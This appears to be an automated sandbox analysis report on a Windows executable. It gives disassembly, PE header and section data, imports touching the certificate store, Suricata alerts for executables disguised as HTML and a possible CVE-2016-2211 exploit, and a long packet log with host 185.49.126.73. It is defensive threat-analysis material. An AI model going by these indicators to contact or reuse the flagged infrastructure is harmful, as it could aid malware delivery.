pop dword ptr [004118D0h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [004118C4h], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [004118C8h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [004118D4h], eax
mov eax, dword ptr [ebp-00000324h]
mov dword ptr [00411810h], 00010001h

Rich Headers

Programming Language:

[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1060c	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x13000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x11800	0x2d80
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x14000	0xddc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xfe38	0x70	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xfd78	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xb000	0x13c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9cf8	0x9e00	bae4521030709e187bdbe8a34d7bf731	False	0.6035650712025317	data	6.581464957368758	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xb000	0x5d58	0x5e00	5885f441ed28e3701c5e80bf46cb5c4b	False	0.4178440824468085	Applesoft BASIC program data, first line number 1	4.8432689099793915	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x11000	0x11cc	0x800	04a548a5c04675d08166d3823a6bf61b	False	0.16357421875	data	2.0120795802951505	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x13000	0x1e0	0x200	aa256780346be2e1ee49ac6d69d2faff	False	0.52734375	data	4.703723272345726	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x14000	0xddc	0xe00	908329e10a1923a3c4938a10d44237d9	False	0.7776227678571429	data	6.495696626464028	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x13060	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL

Import

KERNEL32.dll

LocalFree, GetProcAddress, LoadLibraryA, Sleep, LocalAlloc, GetModuleFileNameW, DecodePointer, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, GetModuleFileNameA, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap, HeapSize, HeapReAlloc, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetFilePointerEx, WriteConsoleW, CreateFileW

CRYPT32.dll

CertDeleteCertificateFromStore, CryptMsgGetParam, CertCloseStore, CryptQueryObject, CertAddCertificateContextToStore, CertFindAttribute, CertFreeCertificateContext, CertCreateCertificateContext, CertOpenSystemStoreA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-13T18:18:08.450586+0100	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	185.49.126.73	443	192.168.2.4	49749	TCP
2024-11-13T18:18:09.799995+0100	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	185.49.126.73	443	192.168.2.4	49750	TCP
2024-11-13T18:18:14.618715+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	20.109.210.53	443	192.168.2.4	49758	TCP
2024-11-13T18:18:14.695907+0100	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	185.49.126.73	443	192.168.2.4	49757	TCP
2024-11-13T18:18:16.078938+0100	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	185.49.126.73	443	192.168.2.4	49760	TCP
2024-11-13T18:18:18.971122+0100	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	185.49.126.73	443	192.168.2.4	49761	TCP
2024-11-13T18:18:20.743010+0100	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	185.49.126.73	443	192.168.2.4	49762	TCP
2024-11-13T18:18:22.288207+0100	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	185.49.126.73	443	192.168.2.4	49763	TCP
2024-11-13T18:18:23.625915+0100	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	185.49.126.73	443	192.168.2.4	49764	TCP
2024-11-13T18:18:52.068139+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	20.109.210.53	443	192.168.2.4	49767	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 13, 2024 18:17:58.051824093 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:17:58.051925898 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:17:58.052149057 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:17:58.092571020 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:17:58.092650890 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:17:58.980479002 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:17:58.980652094 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:17:59.121144056 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:17:59.121237040 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:17:59.122149944 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:17:59.169167042 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:17:59.631169081 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:17:59.675333977 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:00.011976957 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:00.012046099 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:00.012068987 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:00.012110949 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:00.012162924 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:00.012242079 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:00.012242079 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:00.012242079 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:00.012242079 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:00.012314081 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:00.012382984 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:00.023283958 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:00.023371935 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:00.023399115 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:00.023415089 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:00.023464918 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:00.075436115 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:00.128715992 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:00.128741980 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:00.128789902 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:00.128962994 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:00.129035950 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:00.129079103 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:00.129102945 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:00.151983976 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:00.152034044 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:00.152185917 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:00.152257919 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:00.152299881 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:00.152324915 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:00.153256893 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:00.153275967 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:00.153357983 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:00.153373003 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:00.153444052 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:00.155749083 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:00.155775070 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:00.155833006 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:00.155847073 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:00.155899048 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:00.155917883 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:00.246568918 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:00.246625900 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:00.246706009 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:00.246788979 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:00.246789932 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:00.246789932 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:00.246857882 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:00.246920109 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:00.259341002 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:00.259433985 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:00.259504080 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:00.642343998 CET	49735	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:00.642374039 CET	443	49735	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:00.642684937 CET	49735	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:00.642684937 CET	49735	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:00.642708063 CET	443	49735	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:01.496931076 CET	443	49735	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:01.497019053 CET	49735	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:01.499349117 CET	49735	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:01.499361038 CET	443	49735	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:01.499694109 CET	443	49735	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:01.500677109 CET	49735	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:01.543329954 CET	443	49735	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:01.865581989 CET	443	49735	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:01.865607977 CET	443	49735	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:01.865631104 CET	443	49735	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:01.865742922 CET	49735	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:01.865787983 CET	443	49735	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:01.865859985 CET	49735	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:01.866795063 CET	49735	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:01.866843939 CET	443	49735	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:01.866909981 CET	49735	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:07.051987886 CET	49749	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:07.052037001 CET	443	49749	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:07.052222967 CET	49749	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:07.052687883 CET	49749	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:07.052700043 CET	443	49749	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:07.913364887 CET	443	49749	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:07.913469076 CET	49749	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:07.914998055 CET	49749	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:07.915009022 CET	443	49749	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:07.915374041 CET	443	49749	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:07.942142963 CET	49749	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:07.983333111 CET	443	49749	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:08.330471992 CET	443	49749	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:08.330533028 CET	443	49749	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:08.330575943 CET	443	49749	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:08.330598116 CET	49749	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:08.330635071 CET	443	49749	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:08.330647945 CET	49749	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:08.330681086 CET	49749	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:08.331726074 CET	443	49749	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:08.331778049 CET	443	49749	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:08.331818104 CET	49749	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:08.331825972 CET	443	49749	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:08.331856012 CET	49749	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:08.372175932 CET	49749	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:08.449331999 CET	443	49749	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:08.449393988 CET	443	49749	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:08.449426889 CET	49749	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:08.449435949 CET	443	49749	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:08.449470997 CET	49749	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:08.449482918 CET	49749	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:08.450642109 CET	443	49749	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:08.450696945 CET	443	49749	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:08.450722933 CET	49749	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:08.450730085 CET	443	49749	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:08.450761080 CET	49749	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:08.450773954 CET	49749	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:08.452354908 CET	443	49749	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:08.452399015 CET	443	49749	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:08.452450037 CET	49749	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:08.452455997 CET	443	49749	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:08.452492952 CET	49749	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:08.453775883 CET	443	49749	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:08.453815937 CET	443	49749	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:08.453851938 CET	49749	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:08.453857899 CET	443	49749	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:08.453886032 CET	49749	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:08.453897953 CET	49749	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:08.454458952 CET	49749	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:08.454534054 CET	443	49749	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:08.454596043 CET	49749	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:08.465728045 CET	49750	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:08.465826988 CET	443	49750	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:08.465929031 CET	49750	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:08.466263056 CET	49750	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:08.466296911 CET	443	49750	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:09.320414066 CET	443	49750	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:09.320563078 CET	49750	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:09.322115898 CET	49750	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:09.322144985 CET	443	49750	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:09.322504997 CET	443	49750	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:09.323580980 CET	49750	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:09.367336988 CET	443	49750	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:09.681304932 CET	443	49750	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:09.681344032 CET	443	49750	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:09.681365013 CET	443	49750	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:09.681524038 CET	49750	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:09.681597948 CET	443	49750	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:09.681670904 CET	49750	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:09.682821989 CET	443	49750	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:09.682843924 CET	443	49750	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:09.682888985 CET	49750	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:09.682912111 CET	443	49750	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:09.682940960 CET	49750	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:09.731617928 CET	49750	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:09.798919916 CET	443	49750	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:09.798962116 CET	443	49750	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:09.799067020 CET	49750	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:09.799134970 CET	443	49750	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:09.799173117 CET	49750	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:09.799978018 CET	443	49750	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:09.800023079 CET	443	49750	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:09.800079107 CET	49750	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:09.800097942 CET	443	49750	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:09.800124884 CET	49750	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:09.803935051 CET	49750	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:09.803993940 CET	443	49750	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:09.804075003 CET	49750	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:09.822702885 CET	49752	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:09.822736025 CET	443	49752	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:09.823992014 CET	49752	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:09.824310064 CET	49752	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:09.824325085 CET	443	49752	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:10.720809937 CET	443	49752	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:10.721113920 CET	49752	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:10.723191023 CET	49752	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:10.723211050 CET	443	49752	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:10.723551035 CET	443	49752	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:10.724526882 CET	49752	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:10.767334938 CET	443	49752	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:10.980628967 CET	443	49752	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:11.028436899 CET	49752	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:11.028455019 CET	443	49752	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:11.028971910 CET	49752	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:11.029261112 CET	443	49752	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:11.029330969 CET	49752	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:11.033310890 CET	49754	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:11.033334970 CET	443	49754	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:11.033396006 CET	49754	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:11.033595085 CET	49754	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:11.033601046 CET	443	49754	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:11.883631945 CET	443	49754	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:11.883759022 CET	49754	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:11.885162115 CET	49754	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:11.885170937 CET	443	49754	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:11.885386944 CET	443	49754	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:11.886488914 CET	49754	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:11.931332111 CET	443	49754	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:12.133094072 CET	443	49754	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:12.184660912 CET	49754	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:12.184676886 CET	443	49754	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:12.185086012 CET	49754	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:12.185187101 CET	443	49754	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:12.185240030 CET	49754	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:12.189708948 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:12.189773083 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:12.189832926 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:12.190135002 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:12.190171003 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:13.064579964 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:13.064713001 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:13.066078901 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:13.066107988 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:13.066628933 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:13.067904949 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:13.111342907 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:13.320519924 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:13.372159958 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:13.372191906 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:13.372653961 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:13.372803926 CET	443	49755	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:13.372872114 CET	49755	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:13.377609015 CET	49757	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:13.377661943 CET	443	49757	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:13.377851963 CET	49757	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:13.377964973 CET	49757	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:13.377980947 CET	443	49757	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:14.217438936 CET	443	49757	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:14.217544079 CET	49757	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:14.219131947 CET	49757	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:14.219151974 CET	443	49757	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:14.219544888 CET	443	49757	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:14.220568895 CET	49757	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:14.263367891 CET	443	49757	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:14.577769041 CET	443	49757	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:14.577835083 CET	443	49757	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:14.577877998 CET	443	49757	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:14.577905893 CET	49757	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:14.577958107 CET	443	49757	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:14.577979088 CET	49757	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:14.578012943 CET	49757	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:14.579005957 CET	443	49757	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:14.579052925 CET	443	49757	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:14.579088926 CET	49757	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:14.579101086 CET	443	49757	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:14.579133034 CET	49757	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:14.622452974 CET	49757	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:14.694881916 CET	443	49757	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:14.694914103 CET	443	49757	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:14.695096016 CET	49757	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:14.695096970 CET	49757	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:14.695168018 CET	443	49757	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:14.695242882 CET	49757	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:14.695947886 CET	443	49757	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:14.695993900 CET	443	49757	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:14.696029902 CET	49757	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:14.696044922 CET	443	49757	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:14.696075916 CET	49757	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:14.696100950 CET	49757	443	192.168.2.4	185.49.126.73
